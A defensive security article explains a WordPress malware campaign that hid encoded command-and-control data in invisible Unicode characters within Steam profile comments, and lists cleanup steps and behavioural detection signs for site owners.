Cybercriminals are always looking for places to hide. Sometimes that means compromised servers, fake domains, or cloud storage accounts. In one recent WordPress malware campaign, attackers took a more unusual route: they used Steam Community profile comments as part of their command-and-control setup.
At first glance, that sounds odd. Steam is a gaming platform, not a typical malware hosting service. That is exactly what makes the technique interesting. By placing hidden data inside public profile comments on a trusted platform, attackers made their infrastructure look less suspicious than a random malicious server.
This campaign is a useful reminder that modern website malware is not always obvious. It may not rely on a suspicious-looking file name or a hardcoded malicious domain. Sometimes the dangerous part is hidden in plain sight.
What Happened
Security researchers found malware targeting WordPress sites that fetched data from Steam Community profile comments. Those comments appeared normal to a casual viewer, but they contained hidden encoded information.
The infected WordPress site would retrieve the public Steam profile page, extract comment content, decode hidden data from it, and use that decoded data to load malicious JavaScript on the website.
The Steam comment acted like a hidden instruction board. The malware on the WordPress site checked that board, decoded the instructions, and then used them to decide what script to load.
Why Use Steam Profile Comments
Attackers often try to make their activity blend in with normal internet traffic. A request to an obviously suspicious domain may stand out in logs or security tools. A request to a well-known platform may attract less attention.
Using a trusted platform also gives attackers flexibility. Instead of modifying malware code on every infected WordPress site, they can change the content hosted elsewhere. The infected sites then fetch the updated instructions the next time the malware runs.
This is a common idea in command-and-control design: separate the infected system from the place where instructions are stored. The unusual part here is the use of public comments on a gaming community platform.
How the Hidden Data Worked
The campaign used a form of steganography, which means hiding information inside something that appears harmless. Instead of hiding data in an image or document, the malware hid it inside text.
The visible comment text acted as cover. The real data was encoded using invisible Unicode characters, such as zero-width characters. These characters do not display on screen, so a person viewing the comment might see ordinary text while the malware sees a hidden message.
Once the WordPress malware extracted the comment, it scanned for those invisible characters, converted them back into data, and used the result to build the next stage of the attack.
Some samples also included encryption and integrity checks. That means the hidden payload was not just obscured but also protected in a way that made casual analysis more difficult.
What the Malware Did on WordPress Sites
The malware had two main jobs.
The first was client-side script injection. Once the malware decoded the hidden data from the Steam comment, it used that information to load an external JavaScript file into public WordPress pages. Visitors to the infected site could then be exposed to whatever the attacker's script was designed to do.
The second was persistence through a server-side backdoor. The malware included code that allowed attackers to send specially crafted requests to the infected WordPress site. If the request passed the malware's checks, the attacker could modify plugin or theme files.
That matters because removing only the visible script injection may not be enough. If the backdoor remains, the attacker may be able to reinfect the site or change the malware later.
Why This Technique Is Harder to Detect
This campaign combines several tactics that make detection more difficult.
| Tactic | Why It Helps the Attacker |
|---|---|
| Abuses a legitimate platform | Traffic to a well-known site raises less suspicion than traffic to an unknown domain |
| Hides commands in invisible characters | A visual review of the comment reveals nothing |
| Separates control data from the infected site | Attackers can update behavior without touching every victim site |
| Persistent backdoor | Cleanup of the visible symptom does not remove deeper access |
Security teams that only monitor for known malicious domains, recently registered infrastructure, or obviously suspicious file names may miss an attack that routes commands through a trusted gaming platform.
What WordPress Site Owners Should Do
The biggest lesson is that malware cleanup needs to go deeper than the obvious symptom. A site loading a suspicious script may only be showing the visible part of a larger compromise.
A proper response should include:
- Reviewing recently modified theme and plugin files
- Checking for unauthorized admin accounts
- Rotating passwords, access keys, and API credentials
- Updating WordPress core, plugins, and themes
- Reviewing server logs for unusual POST requests or unexpected outbound traffic
It is also important to understand how the attacker got in. Common entry points include stolen credentials, vulnerable plugins, outdated themes, weak hosting access, or compromised administrator accounts. Cleaning the malware without closing the entry point leads to reinfection.
What Defenders Should Watch For
Even without specific indicators, defenders can look for behavioral patterns:
| Pattern | Why It Matters |
|---|---|
| WordPress code fetching content from unrelated third-party platforms | Legitimate plugins generally do not do this |
| Plugin or theme files making unexpected outbound requests | Points to attacker-controlled fetching behavior |
| Invisible-character decoding inside PHP code | Suggests steganographic payload extraction |
| Unexpected JavaScript added to public pages | Visible symptom of the injection stage |
| PHP code responding to specially crafted POST requests | Signs of a backdoor |
| Recently modified files in plugins or themes that should not have changed | Post-compromise modification |
| Obfuscated PHP mixed into otherwise normal WordPress files | Indicator of hidden malicious code |
The key signal is behavioral: legitimate WordPress plugins should not need to pull hidden data from public gaming platform comments and use it to load scripts on visitor-facing pages.
Why This Matters Beyond WordPress
Although this campaign targeted WordPress, the underlying idea is not WordPress-specific. Attackers can abuse legitimate platforms as dead drops for malware instructions. Social profiles, comments, bios, paste sites, cloud documents, and other public content can all be misused in similar ways.
That does not mean every connection to a legitimate platform is malicious. It means defenders need to understand context. A website unexpectedly fetching public profile comments from a gaming platform is very different from a user browsing that platform normally.
Modern detection has to look not only at where traffic goes, but also at why it is happening and what the local code does with the response.
Sources: - GoDaddy — Malware Targeting WordPress Abuses Steam Community Profiles